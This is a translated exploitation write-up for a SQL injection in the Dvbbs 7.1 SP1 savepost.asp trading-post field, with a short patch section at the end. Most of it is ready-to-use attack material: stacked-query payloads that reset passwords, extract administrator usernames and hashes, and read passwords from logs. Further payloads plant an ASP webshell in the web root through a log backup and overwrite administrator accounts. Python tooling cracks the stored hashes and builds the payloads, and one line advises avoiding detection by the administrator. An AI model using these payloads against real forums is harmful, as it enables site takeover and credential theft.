Dvbbs 7.1 SP1 SQL version savepost.asp injection vulnerability: analysis, exploitation and prevention (vulnerability research)

Source: Internet
Author: User
Tags: sql injection, administrator password
I. Overview
Vulnerability Description:
Http://coolersky.com/leak/programme/bbs/2006/0515/515.html
A few days ago I heard from Hak_ban that someone had released a Dvbbs7 vulnerability, but I never found the time to look at it; this afternoon I asked Edward for a link and had a look:
http://www.eviloctal.com/forum/read.php?tid=22074
The original is at:
Http://coolersky.com/articles/hack/analysis/programme/2006/0515/238.html
Having read the prodigal son's analysis, I felt it already explained things quite clearly, but a few friends in the group still didn't follow it, so I simply reproduced the vulnerability in a local test environment. Thanks to Keng for providing the program; I was honestly too lazy to go and find it online.
II. Vulnerability analysis
Since the problem is in savepost.asp, open that file. The prodigal son already pointed out that the ToolsBuyUser parameter is not filtered, so trace that variable through the script.
Line 32, variable declaration:
Private GetPostType, ToMoney, UseTools, ToolsBuyUser, GetMoneyType, Tools_UseTools, Tools_LastPostTime, ToolsInfo, ToolsSetting
Line 111, cleared:
ToolsBuyUser = ""
Line 120, assigned when the GetPostType parameter is 0:
ToolsBuyUser = "0|||$SendMoney"
Line 123, assigned when GetPostType is 1:
ToolsBuyUser = "0|||$GetMoney"
Line 139, assigned when GetPostType is 2 (a trading post); Buy_UserList is the "Can buy user list limit" form field and is concatenated exactly as submitted:
ToolsBuyUser = "0@@@" & Buy_Orders & "@@@" & Buy_VIPType & "@@@" & Buy_UserList & "||$PayMoney|||"
Line 747, building the SQL:
Sql = "INSERT INTO " & TotalUseTable & " (BoardID,ParentID,UserName,Topic,Body,DateAndTime,Length,RootID,Layer,Orders,IP,Expression,LockTopic,SignFlag,EmailFlag,IsBest,PostUserID,IsUpload,IsAudit,UbbList,GetMoney,UseTools,PostBuyUser,GetMoneyType) VALUES (" & Dvbbs.BoardID & "," & ParentID & ",'" & UserName & "','" & Topic & "','" & Content & "','" & DateTimeStr & "'," & Dvbbs.StrLength(Content) & "," & RootID & "," & iLayer & "," & iOrders & ",'" & Dvbbs.UserTrueIP & "','" & Expression(1) & "'," & LockTopic & "," & SignFlag & "," & MailFlag & ",0," & Dvbbs.UserID & "," & iHaveUpFile & "," & IsAudit & ",'" & UbbListBody & "'," & ToMoney & ",'" & UseTools & "','" & ToolsBuyUser & "'," & GetMoneyType & ")"
Line 745, executing the SQL:
Dvbbs.Execute(Sql)
Nowhere between reading the form field and executing the statement is ToolsBuyUser checked or escaped. The user-controlled Buy_UserList ends up inside a single-quoted string literal in the INSERT, so a single quote in the input terminates that literal and whatever follows is parsed as SQL: a classic SQL injection. Because this is the SQL Server edition and SQL Server executes several semicolon-separated statements in one batch, the attacker is not limited to bending the INSERT but can append entire UPDATE, BACKUP or ALTER DATABASE statements of their own.
III. Exploiting the vulnerability
1. Register a user, Coolersky.
2. Choose to post a new topic.
3. Under "Select the type of post", pick "Forum trading post settings".

4. In the "Can buy user list limit:" field, enter the following.
' Change your own user password to 123456
Coolersky',0);update dv_user set userpassword='49ba59abbe56e057' where username='Coolersky';--
The leading Coolersky is arbitrary filler; the single quote ends the PostBuyUser literal, ",0)" supplies GetMoneyType and closes the VALUES list, the semicolon starts a second statement, and "--" comments out the remainder of the original query (the trailing "||$PayMoney|||'" and GetMoneyType). 49ba59abbe56e057 is the 16-character MD5 that Dvbbs stores for 123456 (the middle 16 hex digits of the full 32-character hash).
Then log in to the forum with the new password: if 123456 works, the forum has not been patched.
5. Fetch the front-end administrator's username and password and write them into your own custom avatar and signature fields; they then appear when viewing user Coolersky's profile.
Coolersky',0);update dv_user set userface=(select top 1 username from dv_user where userclass='Administrator'),usersign=(select top 1 userpassword from dv_user where userclass='Administrator') where username='Coolersky';--
The userclass value must match the group label actually stored in the target's dv_user table; 'Administrator' is the translated label shown here.
6. Fetch the back-end administrator's username and password from dv_admin:
Coolersky',0);update dv_user set userface=(select top 1 username from dv_admin),usersign=(select top 1 password from dv_admin) where username='Coolersky';--
7. Read the back-end management password out of the log:
Coolersky',0);update dv_user set usersign=(select l_content from dv_log where l_content like '%password2%') where username='Coolersky';--
If more than one log row matches, SQL Server rejects the UPDATE with "Subquery returned more than 1 value"; add top 1 to the subquery in that case.
8. Get the name of the database:
Coolersky',0);update dv_user set userface=(select db_name()) where username='Coolersky';--
9. Log backup to write a webshell
' Replace dbname with the database name obtained in the previous step; the log backup needs db_owner rights.
' Replace d:\web\dvbbs7\ with the forum's physical path; how to find it is not covered here.
Coolersky',0);alter database dbname set recovery full;create table temptt(a image);backup log dbname to disk='c:\acool_back' with init;insert into temptt(a) values('<%execute request("L")%>');backup log dbname to disk='d:\web\dvbbs7\temptt.asp';drop table temptt;alter database dbname set recovery simple;--
Or, with the ASP one-liner supplied as a hex literal so that no quote characters are needed inside the injected text:
Coolersky',0);alter database dbname set recovery full;create table temptt(a image);backup log dbname to disk='c:\acool_back' with init;insert into temptt(a) values(0x273c2565786563757465207265717565737428226c2229253e27);backup log dbname to disk='d:\web\dvbbs7\temptt.asp';drop table temptt;alter database dbname set recovery simple;--
The first backup with init throws away the existing log, the INSERT puts the one-liner into the log, and the second backup writes that log, one-liner included, to temptt.asp under the web root; the file is mostly binary log data, but ASP only executes what sits between <% and %>.
Then connect with any minimal ASP one-line trojan client.
10. Change the administrator password directly
Steps 5, 6 and 7 yield the front-end and back-end administrator usernames and passwords, but the passwords are at best 16-character MD5 hashes: an online hash lookup or brute force may recover the administrator password and let you log in to both the front end and the back end, but quite possibly the hash cannot be cracked.
If the forum's physical path cannot be found either, the only option left is to change the administrator password. Avoid this where possible, because the administrator will know immediately that the forum has been compromised.
(1) Get the front-end administrator's username:
Coolersky',0);update dv_user set userface=(select top 1 username from dv_user where userclass='Administrator') where username='Coolersky';--
(2) Change the front-end administrator's password:
' Assuming the front-end admin username obtained is admin, change the password to 123456
Coolersky',0);update dv_user set userpassword='49ba59abbe56e057' where username='admin';--
(3) Get the back-end administrator's username:
Coolersky',0);update dv_user set userface=(select top 1 username from dv_admin) where username='Coolersky';--
(4) Change the back-end administrator's password:
' Assuming the back-end admin username obtained is admin, change the password to 123456
Coolersky',0);update dv_admin set password='49ba59abbe56e057' where username='admin';--
(5) Log in to the front end and upload an MDB file containing an ASP one-line backdoor, or from the back end upload an ASP or ASA file; the procedure is not described in this article.
As long as the server accepts several statements in one batch, there is a great deal more that can be done with the database in this way.
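The hash handling behind steps 4 and 10 (the 16-character MD5 that Dvbbs stores, and the "look it up or brute-force it" step), as an added Python example written for this page rather than code from the article or from Dvbbs: dvbbs_hash computes the stored form of a password, to_dvbbs_form reduces a full 32-character MD5 from a lookup site to that form, crack_short_md5 is an offline dictionary check standing in for the online lookup, and password_update_payload rebuilds the step-10 UPDATE from a chosen plaintext. The table and column names and the sample signature value come from the article; the wordlist is constructed, and the utf-8 password encoding is an assumption (non-ASCII passwords would need the forum's own codepage).

```python
import hashlib

# Added example (not Dvbbs code): the 16-character password hash Dvbbs stores
# and the small amount of tooling needed around it for steps 4 and 10.


def dvbbs_hash(password):
    """Dvbbs '16-bit MD5': hex digits 9..24 (the middle 16) of the 32-char MD5.

    Encoding assumption: utf-8; for ASCII passwords every codepage agrees.
    """
    return hashlib.md5(password.encode("utf-8")).hexdigest()[8:24]


def to_dvbbs_form(full_md5_hex):
    """Reduce a full 32-char MD5 (e.g. from a hash lookup site) to the Dvbbs form."""
    return full_md5_hex.lower()[8:24]


def crack_short_md5(short_hash, wordlist):
    """Offline dictionary check standing in for 'online lookup or brute force'.

    Returns the plaintext whose Dvbbs hash equals short_hash, or None.
    """
    target = short_hash.lower()
    for candidate in wordlist:
        if dvbbs_hash(candidate) == target:
            return candidate
    return None


def password_update_payload(table, username, new_password):
    """Rebuild the step-10 payload for the 'Can buy user list limit' field.

    'Coolersky' is filler before the quote that ends the PostBuyUser literal;
    ',0)' closes the VALUES list; '--' comments out the rest of the INSERT.
    The column is userpassword in dv_user and password in dv_admin.
    """
    column = "password" if table.lower() == "dv_admin" else "userpassword"
    return ("Coolersky',0);update " + table + " set " + column + "='"
            + dvbbs_hash(new_password) + "' where username='" + username + "';--")


# Constructed sample: the value step 5 leaves in the signature field when the
# front-end administrator's password is 123456, plus a tiny constructed wordlist.
RECOVERED_SIGNATURE = "49ba59abbe56e057"
WORDLIST = ["password", "admin888", "dvbbs", "123456"]


if __name__ == "__main__":
    print(dvbbs_hash("123456"))                            # 49ba59abbe56e057
    print(crack_short_md5(RECOVERED_SIGNATURE, WORDLIST))  # 123456
    print(password_update_payload("dv_admin", "admin", "123456"))
```

Because the stored value is simply a slice of the standard MD5, any lookup table built for full MD5 hashes also answers the 16-character form: reduce each full hash with to_dvbbs_form before comparing.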
IV. Vulnerability fixes
1. Download the latest patch from Dvbbs:
Http://bbs.dvbbs.net/dispbbs.asp?boardID=8&ID=1187367&page=1
2. Open savepost.asp and change line 747 from
Sql = "INSERT INTO " & TotalUseTable & " (BoardID,ParentID,UserName,Topic,Body,DateAndTime,Length,RootID,Layer,Orders,IP,Expression,LockTopic,SignFlag,EmailFlag,IsBest,PostUserID,IsUpload,IsAudit,UbbList,GetMoney,UseTools,PostBuyUser,GetMoneyType) VALUES (" & Dvbbs.BoardID & "," & ParentID & ",'" & UserName & "','" & Topic & "','" & Content & "','" & DateTimeStr & "'," & Dvbbs.StrLength(Content) & "," & RootID & "," & iLayer & "," & iOrders & ",'" & Dvbbs.UserTrueIP & "','" & Expression(1) & "'," & LockTopic & "," & SignFlag & "," & MailFlag & ",0," & Dvbbs.UserID & "," & iHaveUpFile & "," & IsAudit & ",'" & UbbListBody & "'," & ToMoney & ",'" & UseTools & "','" & ToolsBuyUser & "'," & GetMoneyType & ")"
to:
Sql = "INSERT INTO " & TotalUseTable & " (BoardID,ParentID,UserName,Topic,Body,DateAndTime,Length,RootID,Layer,Orders,IP,Expression,LockTopic,SignFlag,EmailFlag,IsBest,PostUserID,IsUpload,IsAudit,UbbList,GetMoney,UseTools,PostBuyUser,GetMoneyType) VALUES (" & Dvbbs.BoardID & "," & ParentID & ",'" & UserName & "','" & Topic & "','" & Content & "','" & DateTimeStr & "'," & Dvbbs.StrLength(Content) & "," & RootID & "," & iLayer & "," & iOrders & ",'" & Dvbbs.UserTrueIP & "','" & Expression(1) & "'," & LockTopic & "," & SignFlag & "," & MailFlag & ",0," & Dvbbs.UserID & "," & iHaveUpFile & "," & IsAudit & ",'" & UbbListBody & "'," & ToMoney & ",'" & UseTools & "','" & Dvbbs.CheckStr(ToolsBuyUser) & "'," & GetMoneyType & ")"
The Dvbbs.CheckStr function sanitizes the ToolsBuyUser content by doubling single quotes, so a quote in the user input can no longer terminate the string literal. Note that this protects only the one value that sits in string context; the values concatenated unquoted, such as GetMoneyType, must be validated as numbers separately, and the robust fix is to pass all of them as parameters of an ADODB.Command instead of concatenating them into the statement text.
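To make the line-747 concatenation from the analysis section and the effect of the CheckStr fix concrete, here is an added Python model written for this page; it is not Dvbbs code. build_insert mirrors only the tail of the INSERT around PostBuyUser and GetMoneyType, split_statements is a deliberately small T-SQL batch splitter that honours quoted strings and the trailing "--" comment, check_str models CheckStr as quote-doubling (an assumption about that function's behaviour), and hex_literal produces the binary literal used by the second step-9 payload. The table name Dv_bbs1 and the benign user list are constructed; the two payloads are the ones from steps 4 and 9.

```python
# Added example (not Dvbbs code): model of the savepost.asp INSERT, a small
# batch splitter to show what SQL Server would execute, and the quote escape
# the patch applies.

STEP4_PAYLOAD = ("Coolersky',0);update dv_user set userpassword='49ba59abbe56e057'"
                 " where username='Coolersky';--")

STEP9_PAYLOAD = (r"Coolersky',0);alter database dbname set recovery full;"
                 r"create table temptt(a image);"
                 r"backup log dbname to disk='c:\acool_back' with init;"
                 r"insert into temptt(a) values(0x273c2565786563757465207265717565737428226c2229253e27);"
                 r"backup log dbname to disk='d:\web\dvbbs7\temptt.asp';"
                 r"drop table temptt;alter database dbname set recovery simple;--")


def build_tools_buy_user(buy_orders, buy_vip_type, buy_user_list):
    """Line 139 of savepost.asp (GetPostType = 2): Buy_UserList is the
    'Can buy user list limit' form field, concatenated without any check."""
    return ("0@@@" + buy_orders + "@@@" + buy_vip_type + "@@@" + buy_user_list
            + "||$PayMoney|||")


def check_str(value):
    """Model of Dvbbs.CheckStr as applied by the fix: double single quotes so
    they cannot end the literal (assumed behaviour of that function)."""
    return value.replace("'", "''")


def build_insert(tools_buy_user, get_money_type="0", escape=None):
    """Tail of the line-747 INSERT: PostBuyUser is a single-quoted literal,
    GetMoneyType is concatenated unquoted, then the VALUES list closes.
    Table name Dv_bbs1 is constructed; the omitted columns do not matter here."""
    if escape is not None:
        tools_buy_user = escape(tools_buy_user)
    return ("INSERT INTO Dv_bbs1 (PostBuyUser,GetMoneyType) VALUES ('"
            + tools_buy_user + "'," + get_money_type + ")")


def split_statements(sql):
    """Split a T-SQL batch on ';' outside string literals ('' is an escaped
    quote) and stop at a '--' line comment outside a literal. Returns the
    statements SQL Server would run; enough to count them, not a full parser."""
    statements, current, in_string, i = [], [], False, 0
    while i < len(sql):
        ch = sql[i]
        if in_string:
            current.append(ch)
            if ch == "'":
                if sql[i + 1:i + 2] == "'":   # '' inside a literal
                    current.append("'")
                    i += 1
                else:
                    in_string = False
        elif ch == "'":
            in_string = True
            current.append(ch)
        elif sql.startswith("--", i):
            break                             # rest of the batch is commented out
        elif ch == ";":
            statements.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
        i += 1
    tail = "".join(current).strip()
    if tail:
        statements.append(tail)
    return [s for s in statements if s]


def hex_literal(text):
    """SQL Server binary literal (0x...) for text: the step-9 variant that
    needs no quote characters in the injected input."""
    return "0x" + text.encode("latin-1").hex()


def statements_for(buy_user_list, escape=None):
    """Full chain: form field -> ToolsBuyUser -> INSERT -> statements executed."""
    sql = build_insert(build_tools_buy_user("1", "0", buy_user_list), escape=escape)
    return split_statements(sql)


if __name__ == "__main__":
    print(statements_for("alice,bob"))                       # one INSERT
    print(statements_for(STEP4_PAYLOAD))                     # INSERT + attacker's UPDATE
    print(statements_for(STEP4_PAYLOAD, escape=check_str))   # one INSERT again
    print(len(statements_for(STEP9_PAYLOAD)))                # 8
    print(hex_literal('\'<%execute request("l")%>\''))
```

Running statements_for on the step-4 input shows the server receiving two statements, the forum's INSERT and the attacker's UPDATE, while the same input passed through check_str stays inside one INSERT as literal text. The step-9 input expands to eight statements, which is why the exploit depends on the batch being executed as a whole.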